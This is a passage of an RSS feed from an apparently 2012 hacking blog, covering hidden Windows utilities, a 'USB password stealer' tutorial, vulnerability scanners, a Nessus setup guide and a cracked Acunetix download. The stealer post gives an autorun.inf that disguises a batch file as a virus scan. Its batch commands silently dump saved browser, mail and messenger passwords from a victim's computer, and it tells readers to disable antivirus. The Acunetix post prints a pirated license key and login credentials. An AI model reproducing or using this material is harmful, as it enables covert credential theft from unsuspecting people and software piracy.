&lt;br /&gt;
&lt;b style="color: red;"&gt;System Configuration Editor:&lt;/b&gt;&lt;b&gt; &lt;/b&gt;System Configuration Editor can be used to modify System.ini &amp;amp; Win.ini just like in Win98!&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: red;"&gt;Instructions for System Configuration Editor:&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;1.&lt;/b&gt;Click on Start menu and click select Run 2.In the "Run" window, type sysedit and hit Enter key of your keyboard.&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: red;"&gt;Remote Access phone book: &lt;/b&gt;This program's documentation is virtually non-existant.&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: red;"&gt;Instructions for Remote Access phone book :&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;1.&lt;/b&gt;Click on Start menu and click select Run 2.In the "Run" window, type rasphone and hit Enter key of your keyboard.&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: red;"&gt;Registry Editor&lt;/b&gt;: Registry Eidtor is used for hacking the Windows Registry.&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: red;"&gt;Instructions for Registry Editor:&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;1.&lt;/b&gt;Click on Start menu and click select Run 2.In the "Run" window, type regedt32 orregedit and hit Enter key of your keyboard.&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: red;"&gt;Network shared folder wizard: &lt;/b&gt;t is used to create shared folders on network.&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: red;"&gt;Instructions for Network shared folder wizard:&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;1.&lt;/b&gt;Click on Start menu and click select Run 2.In the "Run" window, type shrpubw and hit Enter key of your keyboard.&lt;br /&gt;
&lt;br /&gt;
File siganture verification tool: It's a simple file siganture verification tool.&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: red;"&gt;Instructions for File siganture verification tool:&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;1.&lt;/b&gt;Click on Start menu and click select Run 2.In the "Run" window, type sigverif and hit Enter key of your keyboard.&lt;br /&gt;
&lt;b style="color: black;"&gt;&lt;br /&gt;
&lt;span style="color: red;"&gt;Volume Control:&lt;/span&gt; &lt;/b&gt;This program is helpful for those people that lose it from the System Notification area.&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7p3i-BO8BvHTaFrfl14sfydkpg4d5R6eUpFwlrAr-K2ooMLv4A_NYZIt0expq4D0qI2BX1r9ZYQaGxlF8_Y2mQ2WIxClL_FpoO86ET1ctZMC9YVm_2dDQRYl_kNfk90M6cj1o3A-htw/s1600/hidden+878.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="180" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7p3i-BO8BvHTaFrfl14sfydkpg4d5R6eUpFwlrAr-K2ooMLv4A_NYZIt0expq4D0qI2BX1r9ZYQaGxlF8_Y2mQ2WIxClL_FpoO86ET1ctZMC9YVm_2dDQRYl_kNfk90M6cj1o3A-htw/s400/hidden+878.JPG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;b style="color: red;"&gt;Instructions for Volume Control: 1.Click on Start menu and click select Run 2.In the "Run" window, type sndvol32 and hit Enter key of your keyboard.&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Thanks For Reading&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;
&lt;/b&gt; &lt;b&gt;Keep Visting :- &lt;a href="http://www.indicyborg.blogspot.in/"&gt;IndiCyborg&lt;/a&gt;&lt;/b&gt;&lt;/div&gt;</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5l7dRUlrAO9Dqp5xdZxI9ZGB0rDVaG90oFNbKvpnTmpbKEz4_yvGzJf2CJn-rajQ7kKX2i5NmkHcRcCZsj1ZQGChP_3A2pAZ0asqLdqfC-GNdE0TOo5N26emgPhoJq511S71oPdHrUw/s72-c/hidden-programs.png" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">1</thr:total></item><item><title>How To Make Your Own USB Stealer Steal Password Using Pendrive </title><link>http://indicyborg.blogspot.com/2012/09/how-to-make-your-own-usb-stealer-steal.html</link><category>Facebook</category><category>Gadgets</category><category>Hacking</category><category>Twitter</category><category>Usb</category><author>noreply@blogger.com (Akshay)</author><pubDate>Fri, 7 Sep 2012 04:59:00 -0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1305573116189186826.post-1467078796561574343</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdrWqd4vpN0MOkm54qrLgh0zY9RkpZBGEuH66fESW5D6vKhI7_qG0_bEgu6PJXQ3k2lQUPhfBhyphenhyphen23b7JsK1y7kP3HhrcznTF_jgoVR0jNoCjD5GgllLSm8iyR8npQPTgA8XPVX7cAqEA/s1600/16GB+HACKS+ON+FIRE.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="256" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdrWqd4vpN0MOkm54qrLgh0zY9RkpZBGEuH66fESW5D6vKhI7_qG0_bEgu6PJXQ3k2lQUPhfBhyphenhyphen23b7JsK1y7kP3HhrcznTF_jgoVR0jNoCjD5GgllLSm8iyR8npQPTgA8XPVX7cAqEA/s400/16GB+HACKS+ON+FIRE.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;We Do use &lt;b&gt;Pendrive/Usb&lt;/b&gt; Storage Device for different purpose but i am really interested in &lt;b&gt;hacking friends password using USB Storage device&lt;/b&gt;.Sounds different but yes it is possible i found a way to perform it .&lt;br /&gt;
&lt;br /&gt;
As we all know that windows stores most of its passwords on daily basis , Such as&lt;b&gt;&lt;span style="color: red;"&gt; Msn messenger passwords,Yahoo passwords,Myspace passwords etc&lt;/span&gt;&lt;/b&gt;.Also you know know that there are many tools to recover Saved passwords,so in this article i will explain you on How to made a USB passwords stealer and steal saved passwords form remote Computer.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Before proceeding Download These Required Material&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://www.nirsoft.net/utils/mspass.html"&gt;&lt;b style="color: red;"&gt;MessenPass &lt;/b&gt;&lt;/a&gt;- MessenPass is a password recovery tool that reveals the passwords of the following instant messenger applications:&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://www.nirsoft.net/utils/mailpv.html"&gt;&lt;b style="color: red;"&gt;Mail PassView&lt;/b&gt;&lt;/a&gt; - Mail PassView is a small password-recovery tool that reveals the passwords and other account details for Outlook express,windows mail,POP3 etc&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://www.nirsoft.net/utils/internet_explorer_password.html"&gt;&lt;b style="color: red;"&gt;IE Passview&lt;/b&gt;&lt;/a&gt;: IE passview is a small program that helps us view stored passwords in Internet explorer.&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://www.nirsoft.net/utils/pspv.html"&gt;&lt;b style="color: red;"&gt;Protected storage pass viewer(PSPV)&lt;/b&gt;&lt;/a&gt; - Protected Storage PassView is a small utility that reveals the passwords stored on your computer by Internet Explorer, Outlook Express and MSN Explorer.&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://www.nirsoft.net/utils/passwordfox.html"&gt;&lt;b style="color: red;"&gt;Password fox&lt;/b&gt;&lt;/a&gt;:Password fox is a small program used to view Stored passwords in Mozilla Firefox.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Now Downloaded All the required things come to some real stuff&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: blue;"&gt;Note:Kindly disable your antivirus before performing these steps&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: #351c75;"&gt;Steps to create Own Usb Stealer&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;1.&lt;/b&gt;First of all download all 5 tools and copy the executables (.exe( files in your USB i.e. Copy the files mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;2. &lt;/b&gt;Create a new Notepad and write the following text into it&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: red;"&gt;[autorun]&lt;/span&gt;&lt;br style="color: red;" /&gt;&lt;span style="color: red;"&gt;open=launch.bat&lt;/span&gt;&lt;br style="color: red;" /&gt;&lt;span style="color: red;"&gt;ACTION= Perform a Virus Scan&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
save the Notepad and&lt;b&gt; rename it &lt;/b&gt;from&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;New Text Document.txt&lt;/b&gt; to autorun.inf&lt;br /&gt;
&lt;br /&gt;
Now copy the &lt;b&gt;autorun.inf&lt;/b&gt; file onto your &lt;b&gt;USB pendrive&lt;/b&gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;3. &lt;/b&gt;Create another Notepad and write the following text onto it.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: red;"&gt;start mspass.exe /stext mspass.txt&lt;br /&gt;
start mailpv.exe /stext mailpv.txt&lt;br /&gt;
start iepv.exe /stext iepv.txt&lt;br /&gt;
start pspv.exe /stext pspv.txt&lt;br /&gt;
start passwordfox.exe /stext passwordfox.txt&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
save the Notepad and rename it from&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;
New Text Document.txt to launch.bat&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Copy the &lt;b&gt;launch.bat &lt;/b&gt;file also to your USB drive.&lt;br /&gt;
&lt;br /&gt;
Now your USB Password stealer is ready all you have to do is insert it in your victims computer and a popup will appear, in the popup window select the option (Launch virus scan) as soon as you will click it the following window will appear.&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCXYSloYimp1S0IQVDBmGbXXvpKOiWFh3C5Km-C_2MJYwVqg09GOUcOX2pR8PX2GTVosmB_w5cnkCcuJBYr9VFphyphenhyphenrbjJa2ru9jaRsVf1hct-6DHy3J4J7ZXHxkY1YL1Cr41ZDkBjo9g/s1600/usb+stealer+porn+sex+fuck+hacking+love+explorer+hack.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="369" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCXYSloYimp1S0IQVDBmGbXXvpKOiWFh3C5Km-C_2MJYwVqg09GOUcOX2pR8PX2GTVosmB_w5cnkCcuJBYr9VFphyphenhyphenrbjJa2ru9jaRsVf1hct-6DHy3J4J7ZXHxkY1YL1Cr41ZDkBjo9g/s640/usb+stealer+porn+sex+fuck+hacking+love+explorer+hack.JPG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
After this you can see saved &lt;b style="color: red;"&gt;password in .TXT&lt;/b&gt; files&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Thanks For Reading&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;
&lt;/b&gt; &lt;b&gt;Keep Visiting :- &lt;a href="http://www.indicyborg.blogspot.in/"&gt;&lt;span style="color: red;"&gt;IndiCyborg&lt;/span&gt;&lt;/a&gt;&lt;/b&gt;&lt;/div&gt;</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdrWqd4vpN0MOkm54qrLgh0zY9RkpZBGEuH66fESW5D6vKhI7_qG0_bEgu6PJXQ3k2lQUPhfBhyphenhyphen23b7JsK1y7kP3HhrcznTF_jgoVR0jNoCjD5GgllLSm8iyR8npQPTgA8XPVX7cAqEA/s72-c/16GB+HACKS+ON+FIRE.jpg" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">1</thr:total></item><item><title>Widgets How To Find Vulnerability On A Website Web Vulnerability </title><link>http://indicyborg.blogspot.com/2012/08/crack-acunetix-web-vulnerability.html</link><category>Download</category><category>Hacking</category><category>Software</category><category>Vulnerability Scanner</category><category>Website Hacking</category><author>noreply@blogger.com (Akshay)</author><pubDate>Fri, 31 Aug 2012 06:23:00 -0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1305573116189186826.post-9049615027359105735</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPLnq9QJkfSQZDOLmapyTLO0GFq-GWkANj-fGj1kAISSnyntWoLVDUADW2QtRsAYad-47yzh0U92mKYUcYB4BTZp8Mt138i1ffj9A-IgqbAakEQ77JTsg4el84Svz7rE_yHX48eJuSCg/s1600/HACK_identifier.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="382" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPLnq9QJkfSQZDOLmapyTLO0GFq-GWkANj-fGj1kAISSnyntWoLVDUADW2QtRsAYad-47yzh0U92mKYUcYB4BTZp8Mt138i1ffj9A-IgqbAakEQ77JTsg4el84Svz7rE_yHX48eJuSCg/s640/HACK_identifier.jpg" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
As We All know website gets hacked due to vulnerabilities exist on that site so today i will be giving a brief article on finding Web Vulnerability &lt;br /&gt;
&lt;br /&gt;
Now a days Hackers are concentrating a lot of their efforts to find holes in a web application,And This Is the major reason Reason Why Thousands Of Website Getting hacked.If you are a website owner and having a High Page rank and High Traffic then there is a chance that you might be a victim of these Hackers.&lt;br /&gt;
&lt;br /&gt;
Few years back their existed no proper tools search for vulnerability, but now a days there are tons of tools available through which even a newbie can find a vulnerable site and start Hacking.&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: red;"&gt;Common Methods used for Website Hacking&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
There are lots of methods that can be used to hack a website but most common ones are as follows:&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;1.&lt;a href="http://indicyborg.blogspot.in/search/label/Sql%20Injection"&gt;&lt;span style="color: red;"&gt;SQL Injection&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
2.&lt;a href="http://indicyborg.blogspot.in/search/label/XSS%20Attack"&gt;&lt;span style="color: blue;"&gt;XSS(Cross Site Scripting)&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
3.&lt;span style="color: red;"&gt;Remote File Inclusion(RFI)&lt;/span&gt;&lt;br /&gt;
4.&lt;span style="color: blue;"&gt;Remote File Upload Vulnerability (Exploits)&lt;/span&gt;&lt;br /&gt;
5.&lt;span style="color: red;"&gt;Local File inclusion(LFI)&lt;/span&gt;&lt;br /&gt;
6.&lt;span style="color: blue;"&gt;DDOS attack&lt;/span&gt;&lt;br /&gt;
7.&lt;a href="http://indicyborg.blogspot.in/search/label/Google%20Dorks"&gt;&lt;span style="color: red;"&gt;Google Dorks&lt;/span&gt;&lt;/a&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;And Many More See the Left side Category Box...&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
I Have Putted My Effort And Written All These types of Attack On my Site With Deatil Tutorial few with examples Please Go Through It If You want to Be A Real Hacker.&lt;br /&gt;
&lt;br /&gt;
Now..&lt;br /&gt;
Some Of The Tools that are Mostly used By hacker to hack website Or find Vulnerability on A Website.&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: red;"&gt;Tools Used To Find Website Vulnerability By Hacker.&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Acunetix:&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Acunetix is one of my favorite tool to find a venerability in any web application It automatically checks your web applications for SQL Injection, XSS &amp;amp; all other web vulnerabilities.&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://indicyborg.blogspot.in/2012/08/acunetix-web-vulnerability-scanner.html"&gt;&lt;b style="color: red;"&gt;Download Acunetix For Our link&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Nessus:&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Nessus is the best unix venerability testing tool and among the best to run on windows. Key features of this software include Remote and local file securitychecks a client/server architecture with a GTK graphical interface etc.&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://www.nessus.org/products/nessus/nessus-download-agreement"&gt;&lt;b style="color: red;"&gt;Download Nessus&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Retina&lt;/b&gt;&lt;br /&gt;
Retina is another Vulnerability assessment tool,It scans all the hosts on a network and report on any vulnerabilities found.&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://www.eeye.com/PageNotFound.aspx?aspxerrorpath=/Downloads/Trial-Software/Retina-Network-Security-%20Scanner.aspx"&gt;&lt;b style="color: red;"&gt;Download Retina&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Metasploit Framework :&lt;br /&gt;
&lt;br /&gt;
The Metasploit Framework is the open source penetration testing framework with the world's largest database of public and tested exploits.&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://www.metasploit.com/releases/framework-3.2.exe"&gt;&lt;b style="color: red;"&gt;Download Metasploit(For Windows users)&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Thanks For Reading&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;
&lt;/b&gt; &lt;b&gt;Keep Visitng :- &lt;a href="http://indicyborg.blogspot.in/"&gt;&lt;span style="color: red;"&gt;Indicyborg&lt;/span&gt;&lt;/a&gt;&lt;/b&gt;&lt;/div&gt;</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPLnq9QJkfSQZDOLmapyTLO0GFq-GWkANj-fGj1kAISSnyntWoLVDUADW2QtRsAYad-47yzh0U92mKYUcYB4BTZp8Mt138i1ffj9A-IgqbAakEQ77JTsg4el84Svz7rE_yHX48eJuSCg/s72-c/HACK_identifier.jpg" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">1</thr:total></item><item><title>How to Install and Configure Best Network Scanning Tool Nessus - Scan Network Vulnerabilities In Backtrack </title><link>http://indicyborg.blogspot.com/2012/08/how-to-install-and-configure-best.html</link><category>Backtrack Tutorials</category><category>Software</category><category>Vulnerability Scanner</category><author>noreply@blogger.com (Akshay)</author><pubDate>Fri, 31 Aug 2012 06:10:00 -0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1305573116189186826.post-2225490233606448493</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjeKpp0hVZMqO5HUZUcrkwu4jfGx2pCcakB-RjtvxYRI5vGQlvxQPS9lhFR5r872sMbHtspgF2O8_eYZmILlgO6g1CsQ8CgBYxVxcL9Oi3RPIvM1hOhuLblVGglAIBz0zFiDyZLYh7TEg/s1600/nessus.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="386" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjeKpp0hVZMqO5HUZUcrkwu4jfGx2pCcakB-RjtvxYRI5vGQlvxQPS9lhFR5r872sMbHtspgF2O8_eYZmILlgO6g1CsQ8CgBYxVxcL9Oi3RPIvM1hOhuLblVGglAIBz0zFiDyZLYh7TEg/s400/nessus.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
Vulnerability scanning has always played a vital part to strengthen the security of the server at which your useful sites are hosted. It can also be used to scan the security of the computer which is connected to the internet. It basically scans the open ports and then checks for the vulnerabilities present in the services running on those ports.It is always useful for a server admin or else of any system to be aware of the weak points of the server security so that he may make it a hack proof system. That's why I decided to post a tutorial on this site to help you all scan for the weakness in accordance with the latest increasing available exploits.I suggest using backtrack as every thing is already cooked up there. In any other Linux you may have to install all the packages first.&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: blue;"&gt;Installing Nessus in Linux:-&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Download the Nessus from the official site. Run the following commands under the terminal, If it's present in Downloads:-&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;cd /root/Downloads&lt;/b&gt; (replace root with the username using which you have logged in)&lt;b&gt;dpkg -i Nessus-4.4.1-ubuntu1010_i386.deb&lt;/b&gt;&lt;br /&gt;
Note:- "Nessus-4.4.1-ubuntu1010_i386.deb" is the name of downloaded .deb file. It depends on your version and name of the downloaded nessus version.&lt;br /&gt;
&lt;br /&gt;
Registering and Setting up Nessus:-&lt;br /&gt;
&lt;br /&gt;
Lets start this part.&lt;br /&gt;
I am using "Backtrack 5 r1", So, here I shall go to (A little bit of further effort may tell you how to configure that in any other Linux, as its not much different. Except the menus might be different) &lt;b&gt;Applications&amp;gt;Backtrack&amp;gt;Vulnerability Assessment&amp;gt;Vulnerability Scanners&amp;gt;Nessus&amp;gt;Nessus Register .&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Browser will popup and there it will give you choice whether to use nessus at home or at commercial level. For commercial use you have to purchase a license. So, I am assuming you want to use it at home. Thus select &lt;b&gt;"Using Nessus at home" &lt;/b&gt;and next click agree at next page.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
There provide your email address and then login into your email account and there you have to verify it for nessus and get the activation code needed. Copy that code provided in email which is in the format of &lt;b&gt;xxxx.xxxx.xxxx.xxxx.xxxx&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Open up the terminal and there write following command:-&lt;br /&gt;
&lt;b&gt;/opt/nessus/bin/nessus-fetch --register xxxx.xxxx.xxxx.xxxx.xxxx&lt;/b&gt;&lt;br /&gt;
So, press enter, wait for nessus to fetch newest plugins to scan vulnerabilities and after that your nessus is registered and is ready to be used. Close the terminal.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Now again to go the panel and &lt;b&gt;Applications&amp;gt;Backtrack&amp;gt;Vulnerability Assessment&amp;gt;Vulnerability Scanners&amp;gt;Nessus&amp;gt;nessus user add. &lt;/b&gt;There terminal will popup and then write your username there (Any which you may like) and press enter and write down the password.(Password characters may not be shown not even dots. So, don't worry just write the password),If it asks to give admin privileges in terminal type "y" and press enter. If it asks for any rules then just press enter. And in end it will ask for confirmation type "y" and hit enter.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Now, lets start nessus. Applications&amp;gt;Backtrack&amp;gt;Vulnerability Assessment&amp;gt;Vulnerability Scanners&amp;gt;Nessus&amp;gt;Nessus Start and click it. Terminal will popup showing starting Nessus.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Open up Mozilla (In my case mozilla worked well than chrome. Flash plugin must be pre-installed in browser.). Navigate to :-&lt;b&gt; https://127.0.0.1:8834 &lt;/b&gt;and if it asks for exeption just add one. And let the nessus load. After loading just put the username which you have selected in step number 5 earlier and also type the password chosen there. Hit login and you have a working nessus. &lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Thanks For Reading&amp;nbsp;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;
&lt;/b&gt; &lt;b&gt;Keep Visting :- &lt;a href="http://www.indicyborg.blogspot.in/"&gt;&lt;span style="color: red;"&gt;Indicyborg&lt;/span&gt;&lt;/a&gt;&lt;/b&gt;&lt;/div&gt;</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjeKpp0hVZMqO5HUZUcrkwu4jfGx2pCcakB-RjtvxYRI5vGQlvxQPS9lhFR5r872sMbHtspgF2O8_eYZmILlgO6g1CsQ8CgBYxVxcL9Oi3RPIvM1hOhuLblVGglAIBz0zFiDyZLYh7TEg/s72-c/nessus.jpg" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>Acunetix web vulnerability scanner Version 8 Full Version</title><link>http://indicyborg.blogspot.com/2012/08/acunetix-web-vulnerability-scanner.html</link><category>Download</category><category>Software</category><category>Vulnerability Scanner</category><author>noreply@blogger.com (Akshay)</author><pubDate>Fri, 31 Aug 2012 06:02:00 -0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1305573116189186826.post-870897078948001000</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKJqKXiuuTzPCcL08i_sog7LKYfTgaGDd863OFMBzTtwdVdZN_HDvX-OjQ0b3IsJZ3LLIbvI_G1h6mM3hCKuxyI3678tF6Ft2r9zlPLzmn_9kgUb32KvC0b3-f1c4cfTq6eeRSs241_Q/s1600/Acunetix+Web+Vulnerability+Scanner+.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="454" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKJqKXiuuTzPCcL08i_sog7LKYfTgaGDd863OFMBzTtwdVdZN_HDvX-OjQ0b3IsJZ3LLIbvI_G1h6mM3hCKuxyI3678tF6Ft2r9zlPLzmn_9kgUb32KvC0b3-f1c4cfTq6eeRSs241_Q/s640/Acunetix+Web+Vulnerability+Scanner+.jpg" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;b&gt;Here is the Worlds best and most popular Vulnerability scanner...full version download&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Steps to get full version of Acunetix web scanner v8 for free&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;At First got to this link and download acunetix scanner&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://www.acunetix.com/download/fullver8"&gt;&lt;b style="color: red;"&gt;http://www.acunetix.com/download/fullver8&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;ID: &lt;span style="color: red;"&gt;acunetixwvsfullv8&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b style="color: red;"&gt;&lt;span style="color: black;"&gt;Password: &lt;/span&gt;nFu834!29bg_S2q&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Then install it do not open it&lt;br /&gt;
&lt;br /&gt;
If opened Closed it :P&lt;br /&gt;
&lt;br /&gt;
Open patch and click on patch&lt;br /&gt;
&lt;br /&gt;
Now open Acunetix you will be asked for some details&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: blue;"&gt;Enter below details&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;License Key: &lt;span style="color: red;"&gt;2e3b81463d2s56ae60dwe77fd54f7d60&lt;/span&gt;&lt;br /&gt;
Name: &lt;span style="color: red;"&gt;Hmily/[LCG]&lt;/span&gt;&lt;br /&gt;
ComPany: &lt;span style="color: red;"&gt;Www.52PoJie.Cn&lt;/span&gt;&lt;br /&gt;
Email:&lt;span style="color: red;"&gt; Hmily@Acunetix.com&lt;/span&gt;&lt;br /&gt;
Telephone: &lt;span style="color: red;"&gt;110&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Thanks For Reading&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;
&lt;/b&gt; &lt;b&gt;Keep Visitng :- &lt;a href="http://www.indicyborg.blogspot.in/"&gt;&lt;span style="color: red;"&gt;indicyborg&lt;/span&gt;&lt;/a&gt;&lt;/b&gt;&lt;/div&gt;</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKJqKXiuuTzPCcL08i_sog7LKYfTgaGDd863OFMBzTtwdVdZN_HDvX-OjQ0b3IsJZ3LLIbvI_G1h6mM3hCKuxyI3678tF6Ft2r9zlPLzmn_9kgUb32KvC0b3-f1c4cfTq6eeRSs241_Q/s72-c/Acunetix+Web+Vulnerability+Scanner+.jpg" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">5</thr:total></item><item><title>Few Best Hacking Movie  Geek Movies To Watch </title><link>http://indicyborg.blogspot.com/2012/08/few-best-hacking-movie-geek-movies-to.html</link><category>Download</category><category>Fun</category><category>Hollywood Movies</category><category>Learning</category><category>Movies</category><category>Time Pass</category><author>noreply@blogger.com (Akshay)</author><pubDate>Thu, 30 Aug 2012 11:36:00 -0700</pubDate><guid 